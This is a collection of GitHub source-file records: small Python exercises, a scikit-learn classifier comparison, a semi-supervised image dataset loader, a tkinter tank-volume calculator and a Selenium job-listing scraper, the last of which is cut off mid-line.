+{"seq_id":"34943469917","text":"# coding=utf-8\ndef fibo(n):\n a, b = 0, 1\n while b < n:\n print(b)\n a, b = b, a + b\n print\n\n\ndef fibo2(n):\n result = []\n a, b = 0, 1\n while b < n:\n result.append(b)\n a, b = b, a + b\n return result\n\n\n'''\n一个模块被另一个模块第一次引入 的时候,其主程序将被执行。如果我们想在模块被引入时,模块中的某一个程序块不执行,这时候可以用__name__来使\n该程序仅在自身模块运行时执行。\n每一个模块都有一个__name__属性,当其值是'__main__'时,表明该模块自身在运行,否则是其他模块在引入。\n'''\nif __name__ == '__main__':\n print(\"程序自身运行\")\nelse:\n print(\"我来子另一模块\")\n","repo_name":"zoushiqing/python","sub_path":"基础/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72994202407","text":"print(\"PygLatin\")\r\n\r\npyg = \"ay\"\r\nasli = input(\"Enter any word: \")\r\nif len(asli) > 0 and asli.isalpha():\r\n word = asli.lower()\r\n first = word[0]\r\n new_word = word[1:]\r\n new_word = new_word + first + pyg\r\n print(new_word)\r\nelse:\r\n print(u\"آپ نے کوئي لفظ درج نہيں کيا ہے۔\")\r\n","repo_name":"yethrosh/Python","sub_path":"PygLatin.py","file_name":"PygLatin.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13553716958","text":"import pandas as pd\r\ndf= pd.read_csv(\"internship_prediction_based.csv\")\r\n\r\nX = df.iloc[:, [2, 3]].values\r\ny = df.iloc[:, 4].values\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(X,y,\r\n test_size=.25,random_state=42)\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nms=MinMaxScaler()\r\nx_train=ms.fit_transform(x_train)\r\nx_test=ms.transform(x_test)\r\n\r\nfrom sklearn.svm import SVC\r\nmodel=SVC(kernel='linear',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Linear Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='rbf',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"RBF Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='poly',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Poly Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='sigmoid',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Sigmoid Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nfrom sklearn.naive_bayes import GaussianNB\r\ngb=GaussianNB()\r\ngb.fit(x_train,y_train)\r\ny_pred=gb.predict(x_test)\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"NB accuracy=\",accuracy_score(y_test,y_pred))","repo_name":"Bose-info/internship_prediction_based-ML-project","sub_path":"internship_prediction_based.py","file_name":"internship_prediction_based.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34177411652","text":"from torchvision.datasets import CIFAR10, CIFAR100, SVHN\nfrom torch.utils.data import Sampler, Dataset\nfrom torchvision import transforms\nimport torch\nimport numpy as np\n\nimport os\nimport pickle\nimport pdb\n\nimport logging\n\nfrom hashlib import md5\n\nDATASETS = ['cifar10', 'svhn']\n\n\nclass SemiSupervisedDataset(Dataset):\n def __init__(self,\n base_dataset='cifar10',\n downsample=1,\n take_fraction=None,\n take_amount_seed=1,\n semisupervised=False,\n sup_labels=None,\n unsup_labels=None,\n test_labels=None,\n add_cifar100=False,\n add_svhn_extra=False,\n aux_data_filename=None,\n aux_targets_filename=None,\n add_aux_labels=False,\n aux_take_amount=None,\n aux_label_noise=None,\n train=False,\n **kwargs):\n\n if base_dataset == 'cifar10':\n self.dataset = CIFAR10(train=train, **kwargs)\n elif base_dataset == 'svhn':\n if train:\n self.dataset = SVHN(split='train', **kwargs)\n else:\n self.dataset = SVHN(split='test', **kwargs)\n # because torchvision is annoying\n self.dataset.targets = self.dataset.labels\n self.targets = list(self.targets)\n\n if train and add_svhn_extra:\n svhn_extra = SVHN(split='extra', **kwargs)\n self.data = np.concatenate([self.data, svhn_extra.data])\n self.targets.extend(svhn_extra.labels)\n else:\n raise ValueError('Dataset %s not supported' % base_dataset)\n self.base_dataset = base_dataset\n self.train = train\n self.transform = self.dataset.transform\n\n if self.train:\n # Collecting subset of train data with relevant labels\n if sup_labels is not None:\n self.sup_indices = [i for (i, label) in enumerate(self.targets)\n if label in sup_labels]\n else:\n self.sup_indices = np.arange(len(self.targets))\n sup_labels = range(max(self.targets) + 1)\n\n # Collecting subset of train data with relevant labels\n if unsup_labels is not None:\n self.unsup_indices = [i for (i, label) in\n enumerate(self.targets)\n if label in unsup_labels]\n else:\n self.unsup_indices = np.arange(len(self.targets))\n\n self.sup_indices = self.sup_indices[::downsample]\n if take_fraction is not None:\n rng_state = np.random.get_state()\n np.random.seed(take_amount_seed)\n take_inds = np.random.choice(len(self.sup_indices),\n int(take_fraction*len(self.sup_indices)),\n replace=False)\n np.random.set_state(rng_state)\n\n logger = logging.getLogger()\n logger.info('Randomly taking only %d/%d examples from training'\n ' set, seed=%d, indices=%s',\n take_fraction*len(self.sup_indices), len(self.sup_indices),\n take_amount_seed, take_inds)\n self.sup_indices = self.sup_indices[take_inds]\n\n self.unsup_indices = list(set(self.unsup_indices)\n - set(self.sup_indices))\n\n if semisupervised:\n labeled = [self.targets[i] for i in self.sup_indices]\n labeled = [sup_labels.index(i) for i in labeled]\n unlabeled = [-1] * len(self.unsup_indices)\n self.targets = labeled + unlabeled\n self.data = np.concatenate((self.data[self.sup_indices],\n self.data[self.unsup_indices]),\n axis=0)\n self.sup_indices = list(range(len(self.sup_indices)))\n self.unsup_indices = list(\n range(len(self.sup_indices),\n len(self.sup_indices)+len(self.unsup_indices)))\n # self.train_labels = [\n # label if i % downsample == 0 else -1\n # for (i, label) in enumerate(self.train_labels)]\n else:\n self.all_targets = np.copy(self.targets)\n self.all_data = np.copy(self.data)\n self.targets = [self.targets[i] for i in self.sup_indices]\n self.targets = [sup_labels.index(i) for i in self.targets]\n self.data = self.data[self.sup_indices, ...]\n self.sup_indices = list(range(len(self.sup_indices)))\n\n self.orig_len = len(self.data)\n if add_cifar100:\n orig_len = len(self.data)\n cifar100 = CIFAR100(**kwargs)\n self.data = np.concatenate((self.data, cifar100.data), axis=0)\n self.targets.extend([-1] * len(cifar100.targets))\n self.unsup_indices.extend(\n range(orig_len, orig_len + len(cifar100)))\n\n if aux_data_filename is not None:\n aux_path = os.path.join(kwargs['root'], aux_data_filename)\n print(\"Loading data from %s\" % aux_path)\n with open(aux_path, 'rb') as f:\n aux = pickle.load(f)\n aux_data = aux['data']\n aux_targets = aux['extrapolated_targets']\n orig_len = len(self.data)\n\n if aux_take_amount is not None:\n rng_state = np.random.get_state()\n np.random.seed(take_amount_seed)\n take_inds = np.random.choice(len(aux_data),\n aux_take_amount, replace=False)\n np.random.set_state(rng_state)\n\n logger = logging.getLogger()\n logger.info(\n 'Randomly taking only %d/%d examples from aux data'\n ' set, seed=%d, indices=%s',\n aux_take_amount, len(aux_data),\n take_amount_seed, take_inds)\n aux_data = aux_data[take_inds]\n aux_targets = aux_targets[take_inds]\n\n if not add_aux_labels:\n self.targets.extend([-1] * len(aux_data))\n else:\n if aux_targets_filename is not None:\n aux_path = aux_targets_filename\n print(\"Loading data from %s\" % aux_path)\n with open(aux_path, 'rb') as f:\n aux = pickle.load(f)\n new_aux_targets = aux['extrapolated_targets']\n n = len(aux_targets)\n print('Difference between new and old extrapolated targets = %.3g%%' %\n (100 * (aux_targets != new_aux_targets[:n]).mean()))\n\n if (len(new_aux_targets) > len(aux_targets)):\n assert(len(new_aux_targets) - len(aux_targets) == len(self.unsup_indices))\n true_labels = [self.all_targets[i] for i in self.unsup_indices]\n print('Difference between extrapolated and true labels on training set = %.3g%%' %\n (100 * (true_labels != new_aux_targets[n:]).mean()))\n logging.info('Adding unsupervised %d examples from training data' %(len(self.unsup_indices)))\n unlabeled_data = self.all_data[self.unsup_indices]\n # Since new targets are now included\n self.unsup_indices = []\n aux_data = np.concatenate((aux_data, unlabeled_data), axis=0)\n aux_targets = new_aux_targets\n\n else:\n self.unsup_indices=[]\n if aux_label_noise:\n num_aux = len(aux_targets)\n num_to_noise = int(num_aux * aux_label_noise)\n logging.info('Making %d/%d aux labels noisy, '\n 'numpy rng state MD5=%s' %\n (num_to_noise, num_aux,\n md5(np.random.get_state()[1]).hexdigest()\n ))\n inds_to_noise = np.random.choice(\n num_aux, num_to_noise, replace=False)\n permutated_labels = np.random.permutation(\n aux_targets[inds_to_noise])\n aux_targets[inds_to_noise] = permutated_labels\n\n self.targets.extend(aux_targets)\n self.data = np.concatenate((self.data, aux_data), axis=0)\n # note that we use unsup indices to track the labeled datapoints\n # whose labels are \"fake\"\n self.unsup_indices.extend(\n range(orig_len, orig_len+len(aux_data)))\n\n self.orig_len = orig_len\n logger = logging.getLogger()\n logger.info(\"Training set\")\n logger.info(\"Number of training samples: %d\", len(self.targets))\n logger.info(\"Number of supervised samples: %d\",\n len(self.sup_indices))\n logger.info(\"Number of unsup samples: %d\", len(self.unsup_indices))\n logger.info(\"Label histogram: %s\",\n tuple(\n zip(*np.unique(self.targets, return_counts=True))))\n logger.info(\"Shape of training data: %s\", np.shape(self.data))\n\n # Test set\n else:\n self.orig_len = len(self.data)\n if test_labels is not None:\n self.test_indices = [i for (i, label) in enumerate(self.targets)\n if label in test_labels]\n self.targets = [self.targets[i] for i in self.test_indices]\n self.targets = [test_labels.index(i) for i in self.targets]\n self.data = self.data[self.test_indices, ...]\n self.orig_len = len(self.data)\n logger = logging.getLogger()\n logger.info(\"Test set\")\n logger.info(\"Number of samples: %d\", len(self.targets))\n logger.info(\"Label histogram: %s\",\n tuple(\n zip(*np.unique(self.targets, return_counts=True))))\n logger.info(\"Shape of data: %s\", np.shape(self.data))\n\n @property\n def data(self):\n return self.dataset.data\n\n @data.setter\n def data(self, value):\n self.dataset.data = value\n\n @property\n def targets(self):\n return self.dataset.targets\n\n @targets.setter\n def targets(self, value):\n self.dataset.targets = value\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n self.dataset.labels = self.targets # because torchvision is annoying\n d = self.dataset[item]\n d = list(d)\n d.append(item >= self.orig_len)\n d = tuple(d)\n return d\n # return self.dataset[item]\n\n\n def __repr__(self):\n fmt_str = 'Semisupervised Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Training: {}\\n'.format(self.train)\n fmt_str += ' Root Location: {}\\n'.format(self.dataset.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.dataset.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp, self.dataset.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str\n\n\nclass SemiSupervisedSampler(Sampler):\n def __init__(self, sup_inds, unsup_inds, batch_size, unsup_fraction=0.5,\n num_batches=None):\n if unsup_fraction is None or unsup_fraction < 0:\n self.sup_inds = sup_inds + unsup_inds\n unsup_fraction = 0.0\n else:\n self.sup_inds = sup_inds\n self.unsup_inds = unsup_inds\n\n self.batch_size = batch_size\n unsup_batch_size = int(batch_size * unsup_fraction)\n self.sup_batch_size = batch_size - unsup_batch_size\n\n if num_batches is not None:\n self.num_batches = num_batches\n else:\n self.num_batches = int(\n np.ceil(len(self.sup_inds) / self.sup_batch_size))\n\n\n super().__init__(None)\n\n def __iter__(self):\n batch_counter = 0\n while batch_counter < self.num_batches:\n sup_inds_shuffled = [self.sup_inds[i]\n for i in torch.randperm(len(self.sup_inds))]\n for sup_k in range(0, len(self.sup_inds), self.sup_batch_size):\n if batch_counter == self.num_batches:\n break\n batch = sup_inds_shuffled[sup_k:(sup_k + self.sup_batch_size)]\n # extending with unlabeled data\n if self.sup_batch_size < self.batch_size:\n batch.extend([self.unsup_inds[i] for i in\n torch.randint(high=len(self.unsup_inds),\n size=(\n self.batch_size - len(\n batch),),\n dtype=torch.int64)])\n\n np.random.shuffle(batch)\n yield batch\n batch_counter += 1\n\n def __len__(self):\n return self.num_batches\n","repo_name":"p-lambda/robust_tradeoff","sub_path":"cifar/code/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":14058,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"34422995266","text":"# Gerar executável para windows\n\n# pip install pyinstaller\n\n# pyinstaller --onefile tela.py --noconsole\n\nimport tela_support\nimport sys\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom tkinter.constants import *\nimport os.path\n\n_script = sys.argv[0]\n_location = os.path.dirname(_script)\n\n\n_bgcolor = '#d9d9d9' # X11 color: 'gray85'\n_fgcolor = '#000000' # X11 color: 'black'\n_compcolor = 'gray40' # X11 color: #666666\n_ana1color = '#c3c3c3' # Closest X11 color: 'gray76'\n_ana2color = 'beige' # X11 color: #f5f5dc\n_tabfg1 = 'black'\n_tabfg2 = 'black'\n_tabbg1 = 'grey75'\n_tabbg2 = 'grey89'\n_bgmode = 'light'\n\n\nclass Toplevel1:\n\n def calcular(self):\n altura = float(self.altura.get())\n raio = float(self.diametro.get())/2\n area = round(3.14*raio**2*altura)\n self.Label3_3.configure(text='Volume: '+str(area)+\" m²\")\n\n def __init__(self, top=None):\n '''This class configures and populates the toplevel window.\n top is the toplevel containing window.'''\n\n top.geometry(\"1327x711+114+137\")\n top.minsize(120, 1)\n top.maxsize(1924, 1061)\n top.resizable(1, 1)\n top.title(\"Toplevel 0\")\n top.configure(background=\"#2e3349\")\n top.configure(highlightbackground=\"#d9d9d9\")\n top.configure(highlightcolor=\"black\")\n\n self.top = top\n self.altura = tk.StringVar()\n self.diametro = tk.StringVar()\n\n self.menubar = tk.Menu(top, font=\"TkMenuFont\",\n bg=_bgcolor, fg=_fgcolor)\n top.configure(menu=self.menubar)\n\n self.Label1 = tk.Label(self.top)\n self.Label1.place(relx=0.588, rely=-0.042, height=886, width=1167)\n self.Label1.configure(activebackground=\"#f9f9f9\")\n self.Label1.configure(anchor='w')\n self.Label1.configure(background=\"#2e3349\")\n self.Label1.configure(compound='left')\n self.Label1.configure(disabledforeground=\"#a3a3a3\")\n self.Label1.configure(foreground=\"#000000\")\n self.Label1.configure(highlightbackground=\"#d9d9d9\")\n self.Label1.configure(highlightcolor=\"black\")\n photo_location = os.path.join(\n _location, \"D:/GitHub/puc_minas_iot_industrial_programacao_para_desenvolvimento_iiot/aula3/imagens/tanque.png\")\n global _img0\n _img0 = tk.PhotoImage(file=photo_location)\n self.Label1.configure(image=_img0)\n\n self.Frame1 = tk.Frame(self.top)\n self.Frame1.place(relx=0.039, rely=0.239,\n relheight=0.726, relwidth=0.529)\n self.Frame1.configure(relief='groove')\n self.Frame1.configure(borderwidth=\"2\")\n self.Frame1.configure(relief=\"groove\")\n self.Frame1.configure(background=\"#252a40\")\n self.Frame1.configure(highlightbackground=\"#d9d9d9\")\n self.Frame1.configure(highlightcolor=\"black\")\n\n self.Label3 = tk.Label(self.Frame1)\n self.Label3.place(relx=0.148, rely=0.128, height=79, width=166)\n self.Label3.configure(activebackground=\"#f9f9f9\")\n self.Label3.configure(anchor='w')\n self.Label3.configure(background=\"#252a40\")\n self.Label3.configure(compound='left')\n self.Label3.configure(disabledforeground=\"#a3a3a3\")\n self.Label3.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3.configure(foreground=\"#f2f2f2\")\n self.Label3.configure(highlightbackground=\"#d9d9d9\")\n self.Label3.configure(highlightcolor=\"black\")\n self.Label3.configure(text='''Altura [m]:''')\n\n self.Button1 = tk.Button(self.Frame1)\n self.Button1.place(relx=0.252, rely=0.734, height=74, width=307)\n self.Button1.configure(activebackground=\"beige\")\n self.Button1.configure(activeforeground=\"black\")\n self.Button1.configure(background=\"#007ef9\")\n self.Button1.configure(compound='left')\n self.Button1.configure(disabledforeground=\"#a3a3a3\")\n self.Button1.configure(font=\"-family {Segoe UI} -size 28 -weight bold\")\n self.Button1.configure(foreground=\"#f2f2f2\")\n self.Button1.configure(highlightbackground=\"#d9d9d9\")\n self.Button1.configure(highlightcolor=\"black\")\n self.Button1.configure(pady=\"0\")\n self.Button1.configure(text='''Alterar''')\n\n self.Entry1 = tk.Entry(self.Frame1)\n self.Entry1.place(relx=0.415, rely=0.128, height=60, relwidth=0.348)\n self.Entry1.configure(background=\"white\")\n self.Entry1.configure(disabledforeground=\"#a3a3a3\")\n self.Entry1.configure(font=\"-family {Courier New} -size 20\")\n self.Entry1.configure(foreground=\"#000000\")\n self.Entry1.configure(highlightbackground=\"#d9d9d9\")\n self.Entry1.configure(highlightcolor=\"black\")\n self.Entry1.configure(insertbackground=\"black\")\n self.Entry1.configure(selectbackground=\"#c4c4c4\")\n self.Entry1.configure(selectforeground=\"black\")\n self.Entry1.configure(textvariable=self.altura)\n\n self.Entry2 = tk.Entry(self.Frame1)\n self.Entry2.place(relx=0.415, rely=0.388, height=60, relwidth=0.348)\n self.Entry2.configure(background=\"white\")\n self.Entry2.configure(disabledforeground=\"#a3a3a3\")\n self.Entry2.configure(font=\"-family {Courier New} -size 20\")\n self.Entry2.configure(foreground=\"#000000\")\n self.Entry2.configure(highlightbackground=\"#d9d9d9\")\n self.Entry2.configure(highlightcolor=\"black\")\n self.Entry2.configure(insertbackground=\"black\")\n self.Entry2.configure(selectbackground=\"#c4c4c4\")\n self.Entry2.configure(selectforeground=\"black\")\n self.Entry2.configure(textvariable=self.diametro)\n\n self.Label3_1 = tk.Label(self.Frame1)\n self.Label3_1.place(relx=0.452, rely=-0.252, height=78, width=165)\n self.Label3_1.configure(activebackground=\"#f9f9f9\")\n self.Label3_1.configure(anchor='w')\n self.Label3_1.configure(background=\"#252a40\")\n self.Label3_1.configure(compound='left')\n self.Label3_1.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_1.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_1.configure(foreground=\"#f2f2f2\")\n self.Label3_1.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_1.configure(highlightcolor=\"black\")\n self.Label3_1.configure(text='''Diâmetro [m]:''')\n\n self.Label3_2 = tk.Label(self.Frame1)\n self.Label3_2.place(relx=0.145, rely=0.368, height=79, width=167)\n self.Label3_2.configure(activebackground=\"#f9f9f9\")\n self.Label3_2.configure(anchor='w')\n self.Label3_2.configure(background=\"#252a40\")\n self.Label3_2.configure(compound='left')\n self.Label3_2.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_2.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_2.configure(foreground=\"#f2f2f2\")\n self.Label3_2.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_2.configure(highlightcolor=\"black\")\n self.Label3_2.configure(text='''Diâmetro [m]:''')\n\n self.Label2 = tk.Label(self.top)\n self.Label2.place(relx=0.039, rely=0.068, height=74, width=702)\n self.Label2.configure(activebackground=\"#f9f9f9\")\n self.Label2.configure(anchor='w')\n self.Label2.configure(background=\"#f2f2f2\")\n self.Label2.configure(compound='center')\n self.Label2.configure(disabledforeground=\"#a3a3a3\")\n self.Label2.configure(font=\"-family {Segoe UI} -size 36 -weight bold\")\n self.Label2.configure(foreground=\"#007ef9\")\n self.Label2.configure(highlightbackground=\"#d9d9d9\")\n self.Label2.configure(highlightcolor=\"black\")\n self.Label2.configure(text='''Cálculo do volume''')\n\n self.Label3_3 = tk.Label(self.top)\n self.Label3_3.place(relx=0.716, rely=0.07, height=79, width=307)\n self.Label3_3.configure(activebackground=\"#f9f9f9\")\n self.Label3_3.configure(anchor='w')\n self.Label3_3.configure(background=\"#2e3349\")\n self.Label3_3.configure(compound='left')\n self.Label3_3.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_3.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_3.configure(foreground=\"#ffffff\")\n self.Label3_3.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_3.configure(highlightcolor=\"black\")\n self.Label3_3.configure(text='''Volume:''')\n\n self.Button1.configure(command=self.calcular)\n\n\ndef start_up():\n tela_support.main()\n\n\nif __name__ == '__main__':\n tela_support.main()\n","repo_name":"ubiratantavares/puc_minas_iot_industrial_programacao_para_desenvolvimento_iiot","sub_path":"aula4/tela.py","file_name":"tela.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9579051034","text":"# from os import system\n\n# system('pip install -r requirements.txt')\n\nimport datetime\nimport requests\nimport openpyxl\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium import webdriver\nfrom threading import Thread\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\n\ndef prepare_soup(link:str) -> BeautifulSoup:\n '''\n argument -- link:str\n return -- parsed HTML:BeautifulSoup if successful\n False:bool if failed\n '''\n html = requests.get(link)\n if html.status_code == 200:\n # open('a.txt','w',encoding='utf-8').write(html.text)\n return BeautifulSoup(html.text, \"html.parser\")\n else:\n return False\n\ndef filters():\n title = input(\"Enter job title to search for: \")\n location = input('Enter job location: ')\n postage = int(input(\"\"\"Posted withtin:\n 1. Last 24 hours\n 2. Last 3 days\n 3. Last 7 days\n 4. Last 14 days\n 0. All\n \"\"\"))\n job_type = int(input(\"\"\"Job Type:\n 1. Permanent\n 2. Contract\n 3. Temporary\n 4. Part Time\n 0. All\n\"\"\"))\n salary = int(input(\"\"\" Salary:\n 1. at least £10,000 \n 2. at least £20,000 \n 3. at least £30,000 \n 4. at least £40,000 \n 5. at least £50,000 \n 6. at least £60,000 \n 7. at least £70,000 \n 8. at least £80,000 \n 9. at least £90,000 \n 10. at least £100,000\n 0. All\n \"\"\"))\n N = int(input('Enter number of jobs to be scraped from each site:'))\n return title, location, postage, job_type, salary, N\n\n\n\n\n\ndef open_browser(driver, url):\n driver.get(url) \n return driver\n\n\n\n\ndef click_on_filter(driver, element):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, element))\n )\n element.click()\n\n\n\n\ndef write_xl(df,filename, sheet):\n with pd.ExcelWriter(filename, engine=\"openpyxl\", mode=\"a\") as writer:\n df.to_excel(writer, sheet_name=sheet, index=False, encoding='utf-8')\n\n\n\n\n# soup = None\n\ndef efc(driver, JOBTITLE, LOCATION): \n\n def get_efc_descr(link):\n soup = prepare_soup(link)\n if not soup:\n return ''\n desc = soup.find_all('div',{'class':'jobContentFrame'})[0]\n summary = desc.text.strip()\n return summary\n\n\n age_dict = {0:'', 1 : \"ONE\", 2 : \"THREE\", 3 : \"SEVEN\", 4 : \"SEVEN\"}\n type_dict = [\"CONTRACT\", \"PERMANENT\",\"TEMPORARY\", \"INTERNSHIPS_AND_GRADUATE_TRAINEE\"]\n type_dict.insert(0, '%7C'.join(type_dict))\n if sal_fltr < 4: sal = 'FIRST'\n elif sal_fltr < 8: sal = 'SECOND'\n else: sal = \"THIRD_TIER|FOURTH_TIER|FIFTH_TIER|SIXTH\"\n url = f'https://www.efinancialcareers.com/search/?q={JOBTITLE}&location={LOCATION}&page=1&pageSize=100&filters.postedDate={age_dict[age_fltr]}&filters.positionType={type_dict[jt_fltr]}&filters.salaryBand={sal}_TIER'\n print('fetching from site:', url)\n if age_fltr == 0: \n url = url.replace('&filters.postedDate=','')\n driver = open_browser(driver, url)\n try:\n\n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, \"/html/body/dhi-job-search/dhi-search-page-container/dhi-search-page/div/dhi-search-page-results/div/div[3]/js-search-display/div/div[2]/dhi-search-cards-widget/div/dhi-new-search-card[1]/div\")))\n html = driver.page_source\n # global soup\n soup = BeautifulSoup(html, \"html.parser\")\n for job in soup.findAll('div', 'search-card'):\n if count >= N: \n break\n count += 1\n\n new_link = 'https://www.efinancialcareers.com/' + job.find_all('a',{'class':'card-title-link bold'})[0].attrs['href']\n summary = get_efc_descr(new_link)\n # summary = 'test'\n\n data.append([job.a.text.strip(),\n job.find('div', 'card-salary ng-star-inserted').text.strip(),\n job.find(id = 'searchResultLocation').text.strip(),\n job.find('span', {'data-cy' : 'card-posted-date'}).text.strip(),\n job.find('span', {'data-cy' : 'search-result-employment-type'}).text.strip(),\n summary\n # job.find('div', {'data-cy' : 'card-summary'}).text.strip() + '...'\n ])\n try:\n next_btn = None\n # next_btn = driver.find_element(By.XPATH, \"/html/body/dhi-job-search/dhi-search-page-container/dhi-search-page/div/dhi-search-page-results/div/div[3]/js-search-display/div/div[3]/div[1]/js-search-pagination-container/pagination/ul/li[5]/a\")\n next_btn = driver.find_elements_by_class_name('page-link')\n next_btn[-1].click()\n except NoSuchElementException:\n pass\n except Exception as e:\n # print(e)\n break\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print('An error occured:', e)\n finally:\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, 'efinancialcareers')\n # driver.close()\n print('done')\n\ndef multi_site(driver, JOBTITLE, LOCATION, site = 'cw'):\n url_dict = {\"cw\":'https://www.cwjobs.co.uk',\n \"total\":\"https://www.totaljobs.com\",\n \"jobsite\": \"https://www.jobsite.co.uk/\",\n \"city\": \"https://www.cityjobs.com/\"\n }\n sal_element = f'//*[@id=\"facetListAnnualPayRate\"]/ul/li[{sal_fltr}]/a'\n age_element = f'//*[@id=\"facetListDatePosted\"]/div[2]/ul/li[{age_fltr}]/a'\n jt_element = f'//*[@id=\"facetListJobType\"]/div[2]/ul/li[{jt_fltr}]/a'\n url = url_dict[site]\n print('fetching from site:', url)\n open_browser(driver, url)\n try:\n cookie = driver.find_element_by_class_name(\"privacy-prompt-button.primary-button.accept-button-new\")\n cookie.click()\n except:\n pass\n title_field = driver.find_element_by_id(\"keywords\")\n title_field.send_keys(JOBTITLE)\n loc_field = driver.find_element_by_id(\"location\")\n loc_field.send_keys(LOCATION)\n search_btn = driver.find_element_by_id(\"search-button\")\n search_btn.click()\n try: \n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"col-sm-9.job-results\"))\n )\n if sal_fltr != 0:\n click_on_filter(driver, sal_element)\n if age_fltr != 0:\n click_on_filter(driver, age_element)\n if jt_fltr != 0:\n click_on_filter(driver, jt_element)\n html = driver.page_source\n soup = BeautifulSoup(html, \"html.parser\")\n link_ct = 0\n for job in soup.find_all('div', 'job'):\n link_ct += 1\n if not \"ci-advert-job\" in job['class']:\n if count >= N: \n break\n count += 1\n try:\n links = driver.find_elements_by_class_name('job-title')\n data.append([job.find('h2').text,\n job.find('li', 'salary').text,\n job.find('li', 'location').span.text.replace('\\n', ''),\n job.find('li', 'date-posted').span.text.strip(),\n job.find('li', 'job-type').span.text])\n except:\n print('Some jobs in this site have incomplete information to scrape. Skipping those...')\n # job.find('p', 'job-intro').text])\n try:\n link = links[count].find_element_by_tag_name('a')\n main_window = driver.current_window_handle\n action = ActionChains(driver)\n \n action.key_down(Keys.CONTROL).key_down(Keys.SHIFT).click(link).key_up(Keys.CONTROL).key_up(Keys.SHIFT).perform()\n\n driver.switch_to.window(driver.window_handles[-1])\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"job-description\")))\n desc = driver.page_source\n desc = BeautifulSoup(desc, \"html.parser\")\n p = desc.find('div', \"job-description\").text.strip()\n\n data[-1].append(p)\n # driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 'w')\n driver.close()\n driver.switch_to.window(main_window)\n except Exception as e:\n pass\n # print(e)\n try:\n link_ct = 0\n next_btn = None\n next_btn = driver.find_element_by_class_name('btn.btn-default.next')\n next_btn.click()\n except NoSuchElementException:\n pass\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print(\"An error occured: \",e)\n\n finally:\n print('done')\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, site)\n # driver.close()\n\n\ndef indeed(driver, JOBTITLE, LOCATION):\n\n def indeed_job_description(link):\n soup = prepare_soup(link)\n if not soup:\n return ''\n summary = soup.find(id='jobDescriptionText').text.strip()\n return summary\n \n base_url = 'https://uk.indeed.com'\n\n type_list = ['','permanent','contract','temporary', 'parttime']\n age = {1:1,2:3,3:7,4:14,0:''}\n sal = sal_fltr*10000 if sal_fltr > 0 else ''\n url = 